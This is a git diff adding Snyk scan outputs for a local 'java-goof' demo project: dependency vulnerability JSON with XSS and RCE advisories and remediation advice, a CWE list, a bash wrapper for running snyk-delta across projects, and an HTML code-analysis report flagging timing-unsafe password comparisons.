"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N/E:U/RL:O/RC:R", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:47.749976Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:34.418099Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:54:00.455389Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Cross-site Scripting (XSS). The `SafeHtml` validator annotation fails to properly sanitize payloads consisting of potentially malicious code in HTML comments and instructions.\n## Details\n\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\n\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\n\nInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\n\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\n \nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \n\n### Types of attacks\nThere are a few methods by which XSS can be manipulated:\n\n|Type|Origin|Description|\n|--|--|--|\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\n\n### Affected environments\nThe following environments are susceptible to an XSS attack:\n\n* Web servers\n* Application servers\n* Web application environments\n\n### How to prevent\nThis section describes the top best practices designed to specifically protect your code: \n\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \n* Give users the option to disable client-side scripts.\n* Redirect invalid requests.\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.18.Final, 6.1.0.Final or higher.\n## References\n- [Apache Security Advisory](https://lists.apache.org/thread.html/r87b7e2d22982b4ca9f88f5f4f22a19b394d2662415b233582ed22ebf@%3Cnotifications.accumulo.apache.org%3E)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/124b7dd6d9a4ad24d4d49f74701f05a13e56ceee)\n- [Hibernator Security Release Blog](https://in.relation.to/2019/11/20/hibernate-validator-610-6018-released/)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10219)\n", + "epssDetails": { + "percentile": "0.61710", + "probability": "0.00232", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-10219" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-14T16:07:06.897969Z", + "functions_new": [ + { + "version": [ + "[,6.0.18.Final)", + "[6.1.0.Alpha1,6.1.0.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.constraintvalidators.hv.SafeHtmlValidator", + "functionName": "getFragmentAsDocument" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-10-18T14:55:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-01-09T14:55:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.455389Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:05:55.045961Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Remote Code Execution (RCE) when using `java.sql.Statement` or `java.sql.PreparedStatement` to process untrusted input. By default, it is allowed to call any static method of any Java class in the classpath resulting in code execution.\n\n## Workaround\nUsers who are unable to upgrade to the fixed version can set the system property `hsqldb.method_class_names` to classes which are allowed to be called. For example, `System.setProperty(\"hsqldb.method_class_names\", \"abc\")` or Java argument `-Dhsqldb.method_class_names=\"abc\"` can be used.\n## Remediation\nUpgrade `org.hsqldb:hsqldb` to version 2.7.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212#c7)\n- [GitHub Commit](https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941)\n- [Mitigation](http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html#src_jrt_access_control)\n- [SVN Commit](https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java)\n", + "epssDetails": { + "percentile": "0.85801", + "probability": "0.01274", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-41853" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-77xx-rxvh-q682" + ] + }, + "packageName": "org.hsqldb:hsqldb", + "proprietary": false, + "creationTime": "2022-10-07T07:26:42.276748Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-06T18:52:05Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hsqldb", + "artifactId": "hsqldb" + }, + "publicationTime": "2022-10-07T07:26:42.515068Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.414572Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hsqldb:hsqldb@2.3.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hsqldb:hsqldb", + "version": "2.3.2", + "severityWithCritical": "high" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2", + "severityWithCritical": "medium" + } + ], + "upgrade": { + "org.apache.logging.log4j:log4j-core@2.7": { + "upgradeTo": "org.apache.logging.log4j:log4j-core@2.13.2", + "upgrades": [ + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7", + "org.apache.logging.log4j:log4j-core@2.7" + ], + "vulns": [ + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2314720", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2320014", + "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-31409" + ] + }, + "org.apache.struts:struts2-core@2.3.20": { + "upgradeTo": "org.apache.struts:struts2-core@6.1.2", + "upgrades": [ + "commons-fileupload:commons-fileupload@1.3.1", + "commons-io:commons-io@2.2", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.freemarker:freemarker@2.3.19", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "commons-fileupload:commons-fileupload@1.3.1", + "commons-fileupload:commons-fileupload@1.3.1", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "ognl:ognl@3.0.6", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts:struts2-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20", + "org.apache.struts.xwork:xwork-core@2.3.20" + ], + "vulns": [ + "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "SNYK-JAVA-COMMONSIO-1277109", + "SNYK-JAVA-ORGAPACHESTRUTS-6102825", + "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "SNYK-JAVA-ORGAPACHESTRUTS-1049003", + "SNYK-JAVA-ORGFREEMARKER-1076795", + "SNYK-JAVA-ORGAPACHESTRUTS-608097", + "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "SNYK-JAVA-COMMONSFILEUPLOAD-30401", + "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "SNYK-JAVA-ORGAPACHESTRUTS-31503", + "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "SNYK-JAVA-ORGAPACHESTRUTS-30207", + "SNYK-JAVA-ORGAPACHESTRUTS-30778", + "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "SNYK-JAVA-ORGAPACHESTRUTS-451610", + "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "SNYK-JAVA-OGNL-30474", + "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "SNYK-JAVA-ORGAPACHESTRUTS-30771", + "SNYK-JAVA-ORGAPACHESTRUTS-30772", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418" + ] + }, + "org.springframework:spring-web@3.2.6.RELEASE": { + "upgradeTo": "org.springframework:spring-web@5.3.34", + "upgrades": [ + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-core@3.2.6.RELEASE", + "org.springframework:spring-web@3.2.6.RELEASE" + ], + "vulns": [ + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331" + ] + }, + "org.zeroturnaround:zt-zip@1.12": { + "upgradeTo": "org.zeroturnaround:zt-zip@1.13", + "upgrades": [ + "org.zeroturnaround:zt-zip@1.12" + ], + "vulns": [ + "SNYK-JAVA-ORGZEROTURNAROUND-31681" + ] + } + }, + "patch": {}, + "ignore": {}, + "pin": {} + }, + "filesystemPolicy": false, + "filtered": { + "ignore": [], + "patch": [] + }, + "uniqueCount": 157, + "projectName": "io.github.snyk:todolist-web-struts", + "foundProjectCount": 7, + "displayTargetFile": "todolist-goof/todolist-web-struts/pom.xml", + "hasUnknownVersions": false, + "path": "/Users/austindoll/Documents/GitHub/java-goof" + } +] diff --git a/output.txt b/output.txt new file mode 100644 index 0000000000..41bda4bec4 --- /dev/null +++ b/output.txt @@ -0,0 +1,15 @@ + +Testing /Users/austindoll/Documents/GitHub/java-goof ... + + +✔ Test completed + +Organization: austin.doll +Test type: Static code analysis +Project path: /Users/austindoll/Documents/GitHub/java-goof + +Summary: + +✔ Awesome! No issues were found. + + diff --git a/output2.json b/output2.json new file mode 100644 index 0000000000..f64d7e0220 --- /dev/null +++ b/output2.json @@ -0,0 +1,12 @@ +[ + "CWE-918" +] +[ + "CWE-256" +] +[ + "CWE-918" +] +[ + "CWE-256" +] diff --git a/script.sh b/script.sh new file mode 100755 index 0000000000..3a6fa0ce7a --- /dev/null +++ b/script.sh @@ -0,0 +1,85 @@ +#!/bin/bash + +# Call this script as you would call snyk test | snyk-delta, minus the --all-projects and --json flags +# This is an interim fix until snyk-delta supports all projects itself (or snyk supports a --new flag) +# example: /bin/bash snyk_delta_all_projects.sh --severity=high --exclude=tests,resources -- -s config.yaml +# runs snyk test --all-projects --json $* +# requires jq to be installed + +set -euo pipefail + +exit_code=0 +snyk_test_json='' +formatted_json='' +args=("$*") + +run_snyk_delta () { + # add in any other arguments you would like to use + snyk-delta +} + +run_snyk_test () { + echo "Running: snyk test --all-projects --json" $args + local snyk_exit_code=0 + { + + snyk_test_json=`snyk test --all-projects --json $args` + + } || { + snyk_exit_code=$? + if [ $snyk_exit_code -eq 2 ] + then + echo 'snyk test command was not successful, retry with -d to see more information' + exit 2 + fi + } + + +} + +format_snyk_test_output() { + echo "Procesing snyk test --json output" + { + formatted_json=`echo $snyk_test_json | jq -r 'if type=="array" then .[] else . end | @base64'` + } || { + echo 'failed to process snyk-test result' + exit 2 + } +} + + +####### +# 1. run snyk test +run_snyk_test + +# 2. format results to support single & multiple results returned +format_snyk_test_output + +# 3. call snyk-delta for each result +for test in `echo $formatted_json`; do + single_result="$(echo ${test} | base64 -d)" # use "base64 -d -i" on Windows, which will ignore any "gardage" characters echoing may add + project_name="$(echo ${single_result} | jq -r '.displayTargetFile')" + echo 'Processing: ' ${project_name} + if echo ${single_result} | run_snyk_delta + then + project_exit_code=$? + echo 'Finished processing' + else + project_exit_code=$? + if [ $project_exit_code -gt 1 ] + then + echo 'snyk-delta encountered an error, retrying.' + echo ${single_result} | run_snyk_delta + fi + echo 'Finished processing' + fi + + if [ $project_exit_code -gt $exit_code ] + then + exit_code=$project_exit_code + fi + echo "Project: ${project_name} | Exit code: ${project_exit_code}" +done + +echo "Overall exit code for snyk-delta-all-projects.sh: ${exit_code}" +exit $exit_code diff --git a/snyk.html b/snyk.html new file mode 100644 index 0000000000..c82edb3770 --- /dev/null +++ b/snyk.html @@ -0,0 +1,828 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
+
+
+ + + Snyk - Snyk Code + + + + + + + + + + + + + + + +
+

February 26th 2024, 2:54:11 pm (UTC+00:00)

+
Source: /Users/austindoll/Documents/GitHub/java-goof
+
+
+
+ +
+
+
+

Snyk Code Report

+ +
+
+ 0 high issues +
+
+ 3 medium issues +
+
+ 0 low issues +
+
+
+
+ Scan Coverage +
    +
  • HTML files: 10
  • Python files: 2
  • JavaScript files: 6
  • Java Server Pages files: 12
  • Java files: 36
  • XML files: 14
    • +
+
+
+
+
+
+
+
+

Unprotected Storage of Credentials

+
+ Data Flow + Fix Analysis +
+
+
    +
  • SNYK-CODE
    • +
  • CWE-256
    • +
+
+
+
+

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

+
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 250)
+
+
+

Data Flow

+
todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java
+
+ 250:17 +
return !
changePasswordForm.getNewPassword().equals(changePasswordForm.getConfirmationPassword());
+ SourceSink + 0 +
+
+
+

Fix Analysis

+

Details

+

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

+

Best practices for prevention

+
    +
  • Ensure that passwords are never stored in plain text, even for "purely internal" use.
    • +
  • Never rely on password encoding, such as base 64 encoding; choose a complex encryption algorithm that includes salting, then hashing.
    • +
  • Implement zero-trust approaches in which users have access only to information needed for legitimate business purposes.
    • +
  • To the greatest extent possible, secure the application against injection attacks and other types of weaknesses.
    • +
+
+
+
+
+
+
+
+
+

Unprotected Storage of Credentials

+
+ Data Flow + Fix Analysis +
+
+
    +
  • SNYK-CODE
    • +
  • CWE-256
    • +
+
+
+
+

An attacker might be able to detect the value of the password due to the exposure of comparison timing. When the functions Arrays.equals() or String.equals() are called, they will exit earlier if fewer bytes are matched. Use password encoder such as BCrypt for comparing passwords.

+
Found in: todolist-goof/todolist-web-struts/src/main/java/io/github/benas/todolist/web/action/user/AccountAction.java (line : 254)
+
+
+

Data Flow

+ +
+ 254:17 +
return !
changePasswordForm.getCurrentPassword().equals(user.getPassword());
+ SourceSink + 0 +
+
+
+

Fix Analysis

+

Details

+

If credentials are not protected or not sufficiently protected through strong encryption, attackers can access this information in a number of ways. Developers may rely on plain-text storage of credentials when they believe the system is completely secure from attack or only accessible to insiders. This confidence is misguided and dangerous. If a malicious insider-such as a former employee-or a hostile attacker using SQL injection, XML injection, or a brute-force attack accesses the system, they can access this credential information to gain unauthorized permissions within the system and to export other confidential and secure information.

+

Best practices for prevention

+
    +
